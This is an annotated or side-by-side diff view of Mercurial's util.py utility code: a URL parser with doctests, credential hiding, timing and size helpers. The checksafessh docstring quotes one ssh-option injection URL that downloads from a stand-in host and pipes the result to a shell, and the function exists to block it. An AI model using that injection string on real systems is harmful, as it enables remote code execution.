2733
2731 try:
2734 try:
2732 return socket.getservbyname(pycompat.sysstr(port))
2735 return socket.getservbyname(pycompat.sysstr(port))
2733 except socket.error:
2736 except socket.error:
2734 raise Abort(_("no port number associated with service '%s'") % port)
2737 raise Abort(_("no port number associated with service '%s'") % port)
2735
2738
2736 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2739 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2737 '0': False, 'no': False, 'false': False, 'off': False,
2740 '0': False, 'no': False, 'false': False, 'off': False,
2738 'never': False}
2741 'never': False}
2739
2742
2740 def parsebool(s):
2743 def parsebool(s):
2741 """Parse s into a boolean.
2744 """Parse s into a boolean.
2742
2745
2743 If s is not a valid boolean, returns None.
2746 If s is not a valid boolean, returns None.
2744 """
2747 """
2745 return _booleans.get(s.lower(), None)
2748 return _booleans.get(s.lower(), None)
2746
2749
2747 _hextochr = dict((a + b, chr(int(a + b, 16)))
2750 _hextochr = dict((a + b, chr(int(a + b, 16)))
2748 for a in string.hexdigits for b in string.hexdigits)
2751 for a in string.hexdigits for b in string.hexdigits)
2749
2752
2750 class url(object):
2753 class url(object):
2751 r"""Reliable URL parser.
2754 r"""Reliable URL parser.
2752
2755
2753 This parses URLs and provides attributes for the following
2756 This parses URLs and provides attributes for the following
2754 components:
2757 components:
2755
2758
2756 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2759 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2757
2760
2758 Missing components are set to None. The only exception is
2761 Missing components are set to None. The only exception is
2759 fragment, which is set to '' if present but empty.
2762 fragment, which is set to '' if present but empty.
2760
2763
2761 If parsefragment is False, fragment is included in query. If
2764 If parsefragment is False, fragment is included in query. If
2762 parsequery is False, query is included in path. If both are
2765 parsequery is False, query is included in path. If both are
2763 False, both fragment and query are included in path.
2766 False, both fragment and query are included in path.
2764
2767
2765 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2768 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2766
2769
2767 Note that for backward compatibility reasons, bundle URLs do not
2770 Note that for backward compatibility reasons, bundle URLs do not
2768 take host names. That means 'bundle://../' has a path of '../'.
2771 take host names. That means 'bundle://../' has a path of '../'.
2769
2772
2770 Examples:
2773 Examples:
2771
2774
2772 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2775 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2773 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2776 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2774 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2777 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2775 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2778 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2776 >>> url(b'file:///home/joe/repo')
2779 >>> url(b'file:///home/joe/repo')
2777 <url scheme: 'file', path: '/home/joe/repo'>
2780 <url scheme: 'file', path: '/home/joe/repo'>
2778 >>> url(b'file:///c:/temp/foo/')
2781 >>> url(b'file:///c:/temp/foo/')
2779 <url scheme: 'file', path: 'c:/temp/foo/'>
2782 <url scheme: 'file', path: 'c:/temp/foo/'>
2780 >>> url(b'bundle:foo')
2783 >>> url(b'bundle:foo')
2781 <url scheme: 'bundle', path: 'foo'>
2784 <url scheme: 'bundle', path: 'foo'>
2782 >>> url(b'bundle://../foo')
2785 >>> url(b'bundle://../foo')
2783 <url scheme: 'bundle', path: '../foo'>
2786 <url scheme: 'bundle', path: '../foo'>
2784 >>> url(br'c:\foo\bar')
2787 >>> url(br'c:\foo\bar')
2785 <url path: 'c:\\foo\\bar'>
2788 <url path: 'c:\\foo\\bar'>
2786 >>> url(br'\\blah\blah\blah')
2789 >>> url(br'\\blah\blah\blah')
2787 <url path: '\\\\blah\\blah\\blah'>
2790 <url path: '\\\\blah\\blah\\blah'>
2788 >>> url(br'\\blah\blah\blah#baz')
2791 >>> url(br'\\blah\blah\blah#baz')
2789 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2792 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2790 >>> url(br'file:///C:\users\me')
2793 >>> url(br'file:///C:\users\me')
2791 <url scheme: 'file', path: 'C:\\users\\me'>
2794 <url scheme: 'file', path: 'C:\\users\\me'>
2792
2795
2793 Authentication credentials:
2796 Authentication credentials:
2794
2797
2795 >>> url(b'ssh://joe:xyz@x/repo')
2798 >>> url(b'ssh://joe:xyz@x/repo')
2796 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2799 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2797 >>> url(b'ssh://joe@x/repo')
2800 >>> url(b'ssh://joe@x/repo')
2798 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2801 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2799
2802
2800 Query strings and fragments:
2803 Query strings and fragments:
2801
2804
2802 >>> url(b'http://host/a?b#c')
2805 >>> url(b'http://host/a?b#c')
2803 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2806 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2804 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2807 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2805 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2808 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2806
2809
2807 Empty path:
2810 Empty path:
2808
2811
2809 >>> url(b'')
2812 >>> url(b'')
2810 <url path: ''>
2813 <url path: ''>
2811 >>> url(b'#a')
2814 >>> url(b'#a')
2812 <url path: '', fragment: 'a'>
2815 <url path: '', fragment: 'a'>
2813 >>> url(b'http://host/')
2816 >>> url(b'http://host/')
2814 <url scheme: 'http', host: 'host', path: ''>
2817 <url scheme: 'http', host: 'host', path: ''>
2815 >>> url(b'http://host/#a')
2818 >>> url(b'http://host/#a')
2816 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2819 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2817
2820
2818 Only scheme:
2821 Only scheme:
2819
2822
2820 >>> url(b'http:')
2823 >>> url(b'http:')
2821 <url scheme: 'http'>
2824 <url scheme: 'http'>
2822 """
2825 """
2823
2826
2824 _safechars = "!~*'()+"
2827 _safechars = "!~*'()+"
2825 _safepchars = "/!~*'()+:\\"
2828 _safepchars = "/!~*'()+:\\"
2826 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2829 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2827
2830
2828 def __init__(self, path, parsequery=True, parsefragment=True):
2831 def __init__(self, path, parsequery=True, parsefragment=True):
2829 # We slowly chomp away at path until we have only the path left
2832 # We slowly chomp away at path until we have only the path left
2830 self.scheme = self.user = self.passwd = self.host = None
2833 self.scheme = self.user = self.passwd = self.host = None
2831 self.port = self.path = self.query = self.fragment = None
2834 self.port = self.path = self.query = self.fragment = None
2832 self._localpath = True
2835 self._localpath = True
2833 self._hostport = ''
2836 self._hostport = ''
2834 self._origpath = path
2837 self._origpath = path
2835
2838
2836 if parsefragment and '#' in path:
2839 if parsefragment and '#' in path:
2837 path, self.fragment = path.split('#', 1)
2840 path, self.fragment = path.split('#', 1)
2838
2841
2839 # special case for Windows drive letters and UNC paths
2842 # special case for Windows drive letters and UNC paths
2840 if hasdriveletter(path) or path.startswith('\\\\'):
2843 if hasdriveletter(path) or path.startswith('\\\\'):
2841 self.path = path
2844 self.path = path
2842 return
2845 return
2843
2846
2844 # For compatibility reasons, we can't handle bundle paths as
2847 # For compatibility reasons, we can't handle bundle paths as
2845 # normal URLS
2848 # normal URLS
2846 if path.startswith('bundle:'):
2849 if path.startswith('bundle:'):
2847 self.scheme = 'bundle'
2850 self.scheme = 'bundle'
2848 path = path[7:]
2851 path = path[7:]
2849 if path.startswith('//'):
2852 if path.startswith('//'):
2850 path = path[2:]
2853 path = path[2:]
2851 self.path = path
2854 self.path = path
2852 return
2855 return
2853
2856
2854 if self._matchscheme(path):
2857 if self._matchscheme(path):
2855 parts = path.split(':', 1)
2858 parts = path.split(':', 1)
2856 if parts[0]:
2859 if parts[0]:
2857 self.scheme, path = parts
2860 self.scheme, path = parts
2858 self._localpath = False
2861 self._localpath = False
2859
2862
2860 if not path:
2863 if not path:
2861 path = None
2864 path = None
2862 if self._localpath:
2865 if self._localpath:
2863 self.path = ''
2866 self.path = ''
2864 return
2867 return
2865 else:
2868 else:
2866 if self._localpath:
2869 if self._localpath:
2867 self.path = path
2870 self.path = path
2868 return
2871 return
2869
2872
2870 if parsequery and '?' in path:
2873 if parsequery and '?' in path:
2871 path, self.query = path.split('?', 1)
2874 path, self.query = path.split('?', 1)
2872 if not path:
2875 if not path:
2873 path = None
2876 path = None
2874 if not self.query:
2877 if not self.query:
2875 self.query = None
2878 self.query = None
2876
2879
2877 # // is required to specify a host/authority
2880 # // is required to specify a host/authority
2878 if path and path.startswith('//'):
2881 if path and path.startswith('//'):
2879 parts = path[2:].split('/', 1)
2882 parts = path[2:].split('/', 1)
2880 if len(parts) > 1:
2883 if len(parts) > 1:
2881 self.host, path = parts
2884 self.host, path = parts
2882 else:
2885 else:
2883 self.host = parts[0]
2886 self.host = parts[0]
2884 path = None
2887 path = None
2885 if not self.host:
2888 if not self.host:
2886 self.host = None
2889 self.host = None
2887 # path of file:///d is /d
2890 # path of file:///d is /d
2888 # path of file:///d:/ is d:/, not /d:/
2891 # path of file:///d:/ is d:/, not /d:/
2889 if path and not hasdriveletter(path):
2892 if path and not hasdriveletter(path):
2890 path = '/' + path
2893 path = '/' + path
2891
2894
2892 if self.host and '@' in self.host:
2895 if self.host and '@' in self.host:
2893 self.user, self.host = self.host.rsplit('@', 1)
2896 self.user, self.host = self.host.rsplit('@', 1)
2894 if ':' in self.user:
2897 if ':' in self.user:
2895 self.user, self.passwd = self.user.split(':', 1)
2898 self.user, self.passwd = self.user.split(':', 1)
2896 if not self.host:
2899 if not self.host:
2897 self.host = None
2900 self.host = None
2898
2901
2899 # Don't split on colons in IPv6 addresses without ports
2902 # Don't split on colons in IPv6 addresses without ports
2900 if (self.host and ':' in self.host and
2903 if (self.host and ':' in self.host and
2901 not (self.host.startswith('[') and self.host.endswith(']'))):
2904 not (self.host.startswith('[') and self.host.endswith(']'))):
2902 self._hostport = self.host
2905 self._hostport = self.host
2903 self.host, self.port = self.host.rsplit(':', 1)
2906 self.host, self.port = self.host.rsplit(':', 1)
2904 if not self.host:
2907 if not self.host:
2905 self.host = None
2908 self.host = None
2906
2909
2907 if (self.host and self.scheme == 'file' and
2910 if (self.host and self.scheme == 'file' and
2908 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2911 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2909 raise Abort(_('file:// URLs can only refer to localhost'))
2912 raise Abort(_('file:// URLs can only refer to localhost'))
2910
2913
2911 self.path = path
2914 self.path = path
2912
2915
2913 # leave the query string escaped
2916 # leave the query string escaped
2914 for a in ('user', 'passwd', 'host', 'port',
2917 for a in ('user', 'passwd', 'host', 'port',
2915 'path', 'fragment'):
2918 'path', 'fragment'):
2916 v = getattr(self, a)
2919 v = getattr(self, a)
2917 if v is not None:
2920 if v is not None:
2918 setattr(self, a, urlreq.unquote(v))
2921 setattr(self, a, urlreq.unquote(v))
2919
2922
2920 @encoding.strmethod
2923 @encoding.strmethod
2921 def __repr__(self):
2924 def __repr__(self):
2922 attrs = []
2925 attrs = []
2923 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2926 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2924 'query', 'fragment'):
2927 'query', 'fragment'):
2925 v = getattr(self, a)
2928 v = getattr(self, a)
2926 if v is not None:
2929 if v is not None:
2927 attrs.append('%s: %r' % (a, v))
2930 attrs.append('%s: %r' % (a, v))
2928 return '<url %s>' % ', '.join(attrs)
2931 return '<url %s>' % ', '.join(attrs)
2929
2932
2930 def __bytes__(self):
2933 def __bytes__(self):
2931 r"""Join the URL's components back into a URL string.
2934 r"""Join the URL's components back into a URL string.
2932
2935
2933 Examples:
2936 Examples:
2934
2937
2935 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2938 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2936 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2939 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2937 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2940 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2938 'http://user:pw@host:80/?foo=bar&baz=42'
2941 'http://user:pw@host:80/?foo=bar&baz=42'
2939 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2942 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2940 'http://user:pw@host:80/?foo=bar%3dbaz'
2943 'http://user:pw@host:80/?foo=bar%3dbaz'
2941 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2944 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2942 'ssh://user:pw@[::1]:2200//home/joe#'
2945 'ssh://user:pw@[::1]:2200//home/joe#'
2943 >>> bytes(url(b'http://localhost:80//'))
2946 >>> bytes(url(b'http://localhost:80//'))
2944 'http://localhost:80//'
2947 'http://localhost:80//'
2945 >>> bytes(url(b'http://localhost:80/'))
2948 >>> bytes(url(b'http://localhost:80/'))
2946 'http://localhost:80/'
2949 'http://localhost:80/'
2947 >>> bytes(url(b'http://localhost:80'))
2950 >>> bytes(url(b'http://localhost:80'))
2948 'http://localhost:80/'
2951 'http://localhost:80/'
2949 >>> bytes(url(b'bundle:foo'))
2952 >>> bytes(url(b'bundle:foo'))
2950 'bundle:foo'
2953 'bundle:foo'
2951 >>> bytes(url(b'bundle://../foo'))
2954 >>> bytes(url(b'bundle://../foo'))
2952 'bundle:../foo'
2955 'bundle:../foo'
2953 >>> bytes(url(b'path'))
2956 >>> bytes(url(b'path'))
2954 'path'
2957 'path'
2955 >>> bytes(url(b'file:///tmp/foo/bar'))
2958 >>> bytes(url(b'file:///tmp/foo/bar'))
2956 'file:///tmp/foo/bar'
2959 'file:///tmp/foo/bar'
2957 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2960 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2958 'file:///c:/tmp/foo/bar'
2961 'file:///c:/tmp/foo/bar'
2959 >>> print(url(br'bundle:foo\bar'))
2962 >>> print(url(br'bundle:foo\bar'))
2960 bundle:foo\bar
2963 bundle:foo\bar
2961 >>> print(url(br'file:///D:\data\hg'))
2964 >>> print(url(br'file:///D:\data\hg'))
2962 file:///D:\data\hg
2965 file:///D:\data\hg
2963 """
2966 """
2964 if self._localpath:
2967 if self._localpath:
2965 s = self.path
2968 s = self.path
2966 if self.scheme == 'bundle':
2969 if self.scheme == 'bundle':
2967 s = 'bundle:' + s
2970 s = 'bundle:' + s
2968 if self.fragment:
2971 if self.fragment:
2969 s += '#' + self.fragment
2972 s += '#' + self.fragment
2970 return s
2973 return s
2971
2974
2972 s = self.scheme + ':'
2975 s = self.scheme + ':'
2973 if self.user or self.passwd or self.host:
2976 if self.user or self.passwd or self.host:
2974 s += '//'
2977 s += '//'
2975 elif self.scheme and (not self.path or self.path.startswith('/')
2978 elif self.scheme and (not self.path or self.path.startswith('/')
2976 or hasdriveletter(self.path)):
2979 or hasdriveletter(self.path)):
2977 s += '//'
2980 s += '//'
2978 if hasdriveletter(self.path):
2981 if hasdriveletter(self.path):
2979 s += '/'
2982 s += '/'
2980 if self.user:
2983 if self.user:
2981 s += urlreq.quote(self.user, safe=self._safechars)
2984 s += urlreq.quote(self.user, safe=self._safechars)
2982 if self.passwd:
2985 if self.passwd:
2983 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2986 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2984 if self.user or self.passwd:
2987 if self.user or self.passwd:
2985 s += '@'
2988 s += '@'
2986 if self.host:
2989 if self.host:
2987 if not (self.host.startswith('[') and self.host.endswith(']')):
2990 if not (self.host.startswith('[') and self.host.endswith(']')):
2988 s += urlreq.quote(self.host)
2991 s += urlreq.quote(self.host)
2989 else:
2992 else:
2990 s += self.host
2993 s += self.host
2991 if self.port:
2994 if self.port:
2992 s += ':' + urlreq.quote(self.port)
2995 s += ':' + urlreq.quote(self.port)
2993 if self.host:
2996 if self.host:
2994 s += '/'
2997 s += '/'
2995 if self.path:
2998 if self.path:
2996 # TODO: similar to the query string, we should not unescape the
2999 # TODO: similar to the query string, we should not unescape the
2997 # path when we store it, the path might contain '%2f' = '/',
3000 # path when we store it, the path might contain '%2f' = '/',
2998 # which we should *not* escape.
3001 # which we should *not* escape.
2999 s += urlreq.quote(self.path, safe=self._safepchars)
3002 s += urlreq.quote(self.path, safe=self._safepchars)
3000 if self.query:
3003 if self.query:
3001 # we store the query in escaped form.
3004 # we store the query in escaped form.
3002 s += '?' + self.query
3005 s += '?' + self.query
3003 if self.fragment is not None:
3006 if self.fragment is not None:
3004 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3007 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3005 return s
3008 return s
3006
3009
3007 __str__ = encoding.strmethod(__bytes__)
3010 __str__ = encoding.strmethod(__bytes__)
3008
3011
3009 def authinfo(self):
3012 def authinfo(self):
3010 user, passwd = self.user, self.passwd
3013 user, passwd = self.user, self.passwd
3011 try:
3014 try:
3012 self.user, self.passwd = None, None
3015 self.user, self.passwd = None, None
3013 s = bytes(self)
3016 s = bytes(self)
3014 finally:
3017 finally:
3015 self.user, self.passwd = user, passwd
3018 self.user, self.passwd = user, passwd
3016 if not self.user:
3019 if not self.user:
3017 return (s, None)
3020 return (s, None)
3018 # authinfo[1] is passed to urllib2 password manager, and its
3021 # authinfo[1] is passed to urllib2 password manager, and its
3019 # URIs must not contain credentials. The host is passed in the
3022 # URIs must not contain credentials. The host is passed in the
3020 # URIs list because Python < 2.4.3 uses only that to search for
3023 # URIs list because Python < 2.4.3 uses only that to search for
3021 # a password.
3024 # a password.
3022 return (s, (None, (s, self.host),
3025 return (s, (None, (s, self.host),
3023 self.user, self.passwd or ''))
3026 self.user, self.passwd or ''))
3024
3027
3025 def isabs(self):
3028 def isabs(self):
3026 if self.scheme and self.scheme != 'file':
3029 if self.scheme and self.scheme != 'file':
3027 return True # remote URL
3030 return True # remote URL
3028 if hasdriveletter(self.path):
3031 if hasdriveletter(self.path):
3029 return True # absolute for our purposes - can't be joined()
3032 return True # absolute for our purposes - can't be joined()
3030 if self.path.startswith(br'\\'):
3033 if self.path.startswith(br'\\'):
3031 return True # Windows UNC path
3034 return True # Windows UNC path
3032 if self.path.startswith('/'):
3035 if self.path.startswith('/'):
3033 return True # POSIX-style
3036 return True # POSIX-style
3034 return False
3037 return False
3035
3038
3036 def localpath(self):
3039 def localpath(self):
3037 if self.scheme == 'file' or self.scheme == 'bundle':
3040 if self.scheme == 'file' or self.scheme == 'bundle':
3038 path = self.path or '/'
3041 path = self.path or '/'
3039 # For Windows, we need to promote hosts containing drive
3042 # For Windows, we need to promote hosts containing drive
3040 # letters to paths with drive letters.
3043 # letters to paths with drive letters.
3041 if hasdriveletter(self._hostport):
3044 if hasdriveletter(self._hostport):
3042 path = self._hostport + '/' + self.path
3045 path = self._hostport + '/' + self.path
3043 elif (self.host is not None and self.path
3046 elif (self.host is not None and self.path
3044 and not hasdriveletter(path)):
3047 and not hasdriveletter(path)):
3045 path = '/' + path
3048 path = '/' + path
3046 return path
3049 return path
3047 return self._origpath
3050 return self._origpath
3048
3051
3049 def islocal(self):
3052 def islocal(self):
3050 '''whether localpath will return something that posixfile can open'''
3053 '''whether localpath will return something that posixfile can open'''
3051 return (not self.scheme or self.scheme == 'file'
3054 return (not self.scheme or self.scheme == 'file'
3052 or self.scheme == 'bundle')
3055 or self.scheme == 'bundle')
3053
3056
3054 def hasscheme(path):
3057 def hasscheme(path):
3055 return bool(url(path).scheme)
3058 return bool(url(path).scheme)
3056
3059
3057 def hasdriveletter(path):
3060 def hasdriveletter(path):
3058 return path and path[1:2] == ':' and path[0:1].isalpha()
3061 return path and path[1:2] == ':' and path[0:1].isalpha()
3059
3062
3060 def urllocalpath(path):
3063 def urllocalpath(path):
3061 return url(path, parsequery=False, parsefragment=False).localpath()
3064 return url(path, parsequery=False, parsefragment=False).localpath()
3062
3065
3063 def checksafessh(path):
3066 def checksafessh(path):
3064 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3067 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3065
3068
3066 This is a sanity check for ssh urls. ssh will parse the first item as
3069 This is a sanity check for ssh urls. ssh will parse the first item as
3067 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3070 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3068 Let's prevent these potentially exploited urls entirely and warn the
3071 Let's prevent these potentially exploited urls entirely and warn the
3069 user.
3072 user.
3070
3073
3071 Raises an error.Abort when the url is unsafe.
3074 Raises an error.Abort when the url is unsafe.
3072 """
3075 """
3073 path = urlreq.unquote(path)
3076 path = urlreq.unquote(path)
3074 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3077 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3075 raise error.Abort(_('potentially unsafe url: %r') %
3078 raise error.Abort(_('potentially unsafe url: %r') %
3076 (path,))
3079 (path,))
3077
3080
3078 def hidepassword(u):
3081 def hidepassword(u):
3079 '''hide user credential in a url string'''
3082 '''hide user credential in a url string'''
3080 u = url(u)
3083 u = url(u)
3081 if u.passwd:
3084 if u.passwd:
3082 u.passwd = '***'
3085 u.passwd = '***'
3083 return bytes(u)
3086 return bytes(u)
3084
3087
3085 def removeauth(u):
3088 def removeauth(u):
3086 '''remove all authentication information from a url string'''
3089 '''remove all authentication information from a url string'''
3087 u = url(u)
3090 u = url(u)
3088 u.user = u.passwd = None
3091 u.user = u.passwd = None
3089 return str(u)
3092 return str(u)
3090
3093
3091 timecount = unitcountfn(
3094 timecount = unitcountfn(
3092 (1, 1e3, _('%.0f s')),
3095 (1, 1e3, _('%.0f s')),
3093 (100, 1, _('%.1f s')),
3096 (100, 1, _('%.1f s')),
3094 (10, 1, _('%.2f s')),
3097 (10, 1, _('%.2f s')),
3095 (1, 1, _('%.3f s')),
3098 (1, 1, _('%.3f s')),
3096 (100, 0.001, _('%.1f ms')),
3099 (100, 0.001, _('%.1f ms')),
3097 (10, 0.001, _('%.2f ms')),
3100 (10, 0.001, _('%.2f ms')),
3098 (1, 0.001, _('%.3f ms')),
3101 (1, 0.001, _('%.3f ms')),
3099 (100, 0.000001, _('%.1f us')),
3102 (100, 0.000001, _('%.1f us')),
3100 (10, 0.000001, _('%.2f us')),
3103 (10, 0.000001, _('%.2f us')),
3101 (1, 0.000001, _('%.3f us')),
3104 (1, 0.000001, _('%.3f us')),
3102 (100, 0.000000001, _('%.1f ns')),
3105 (100, 0.000000001, _('%.1f ns')),
3103 (10, 0.000000001, _('%.2f ns')),
3106 (10, 0.000000001, _('%.2f ns')),
3104 (1, 0.000000001, _('%.3f ns')),
3107 (1, 0.000000001, _('%.3f ns')),
3105 )
3108 )
3106
3109
3107 _timenesting = [0]
3110 _timenesting = [0]
3108
3111
3109 def timed(func):
3112 def timed(func):
3110 '''Report the execution time of a function call to stderr.
3113 '''Report the execution time of a function call to stderr.
3111
3114
3112 During development, use as a decorator when you need to measure
3115 During development, use as a decorator when you need to measure
3113 the cost of a function, e.g. as follows:
3116 the cost of a function, e.g. as follows:
3114
3117
3115 @util.timed
3118 @util.timed
3116 def foo(a, b, c):
3119 def foo(a, b, c):
3117 pass
3120 pass
3118 '''
3121 '''
3119
3122
3120 def wrapper(*args, **kwargs):
3123 def wrapper(*args, **kwargs):
3121 start = timer()
3124 start = timer()
3122 indent = 2
3125 indent = 2
3123 _timenesting[0] += indent
3126 _timenesting[0] += indent
3124 try:
3127 try:
3125 return func(*args, **kwargs)
3128 return func(*args, **kwargs)
3126 finally:
3129 finally:
3127 elapsed = timer() - start
3130 elapsed = timer() - start
3128 _timenesting[0] -= indent
3131 _timenesting[0] -= indent
3129 stderr.write('%s%s: %s\n' %
3132 stderr.write('%s%s: %s\n' %
3130 (' ' * _timenesting[0], func.__name__,
3133 (' ' * _timenesting[0], func.__name__,
3131 timecount(elapsed)))
3134 timecount(elapsed)))
3132 return wrapper
3135 return wrapper
3133
3136
3134 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3137 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3135 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3138 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3136
3139
3137 def sizetoint(s):
3140 def sizetoint(s):
3138 '''Convert a space specifier to a byte count.
3141 '''Convert a space specifier to a byte count.
3139
3142
3140 >>> sizetoint(b'30')
3143 >>> sizetoint(b'30')
3141 30
3144 30
3142 >>> sizetoint(b'2.2kb')
3145 >>> sizetoint(b'2.2kb')
3143 2252
3146 2252
3144 >>> sizetoint(b'6M')
3147 >>> sizetoint(b'6M')
3145 6291456
3148 6291456
3146 '''
3149 '''
3147 t = s.strip().lower()
3150 t = s.strip().lower()
3148 try:
3151 try:
3149 for k, u in _sizeunits:
3152 for k, u in _sizeunits:
3150 if t.endswith(k):
3153 if t.endswith(k):
3151 return int(float(t[:-len(k)]) * u)
3154 return int(float(t[:-len(k)]) * u)
3152 return int(t)
3155 return int(t)
3153 except ValueError:
3156 except ValueError:
3154 raise error.ParseError(_("couldn't parse size: %s") % s)
3157 raise error.ParseError(_("couldn't parse size: %s") % s)
3155
3158
3156 class hooks(object):
3159 class hooks(object):
3157 '''A collection of hook functions that can be used to extend a
3160 '''A collection of hook functions that can be used to extend a
3158 function's behavior. Hooks are called in lexicographic order,
3161 function's behavior. Hooks are called in lexicographic order,
3159 based on the names of their sources.'''
3162 based on the names of their sources.'''
3160
3163
3161 def __init__(self):
3164 def __init__(self):
3162 self._hooks = []
3165 self._hooks = []
3163
3166
3164 def add(self, source, hook):
3167 def add(self, source, hook):
3165 self._hooks.append((source, hook))
3168 self._hooks.append((source, hook))
3166
3169
3167 def __call__(self, *args):
3170 def __call__(self, *args):
3168 self._hooks.sort(key=lambda x: x[0])
3171 self._hooks.sort(key=lambda x: x[0])
3169 results = []
3172 results = []
3170 for source, hook in self._hooks:
3173 for source, hook in self._hooks:
3171 results.append(hook(*args))
3174 results.append(hook(*args))
3172 return results
3175 return results
3173
3176
3174 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3177 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3175 '''Yields lines for a nicely formatted stacktrace.
3178 '''Yields lines for a nicely formatted stacktrace.
3176 Skips the 'skip' last entries, then return the last 'depth' entries.
3179 Skips the 'skip' last entries, then return the last 'depth' entries.
3177 Each file+linenumber is formatted according to fileline.
3180 Each file+linenumber is formatted according to fileline.
3178 Each line is formatted according to line.
3181 Each line is formatted according to line.
3179 If line is None, it yields:
3182 If line is None, it yields:
3180 length of longest filepath+line number,
3183 length of longest filepath+line number,
3181 filepath+linenumber,
3184 filepath+linenumber,
3182 function
3185 function
3183
3186
3184 Not be used in production code but very convenient while developing.
3187 Not be used in production code but very convenient while developing.
3185 '''
3188 '''
3186 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3189 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3187 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3190 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3188 ][-depth:]
3191 ][-depth:]
3189 if entries:
3192 if entries:
3190 fnmax = max(len(entry[0]) for entry in entries)
3193 fnmax = max(len(entry[0]) for entry in entries)
3191 for fnln, func in entries:
3194 for fnln, func in entries:
3192 if line is None:
3195 if line is None:
3193 yield (fnmax, fnln, func)
3196 yield (fnmax, fnln, func)
3194 else:
3197 else:
3195 yield line % (fnmax, fnln, func)
3198 yield line % (fnmax, fnln, func)
3196
3199
3197 def debugstacktrace(msg='stacktrace', skip=0,
3200 def debugstacktrace(msg='stacktrace', skip=0,
3198 f=stderr, otherf=stdout, depth=0):
3201 f=stderr, otherf=stdout, depth=0):
3199 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3202 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3200 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3203 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3201 By default it will flush stdout first.
3204 By default it will flush stdout first.
3202 It can be used everywhere and intentionally does not require an ui object.
3205 It can be used everywhere and intentionally does not require an ui object.
3203 Not be used in production code but very convenient while developing.
3206 Not be used in production code but very convenient while developing.
3204 '''
3207 '''
3205 if otherf:
3208 if otherf:
3206 otherf.flush()
3209 otherf.flush()
3207 f.write('%s at:\n' % msg.rstrip())
3210 f.write('%s at:\n' % msg.rstrip())
3208 for line in getstackframes(skip + 1, depth=depth):
3211 for line in getstackframes(skip + 1, depth=depth):
3209 f.write(line)
3212 f.write(line)
3210 f.flush()
3213 f.flush()
3211
3214
3212 class dirs(object):
3215 class dirs(object):
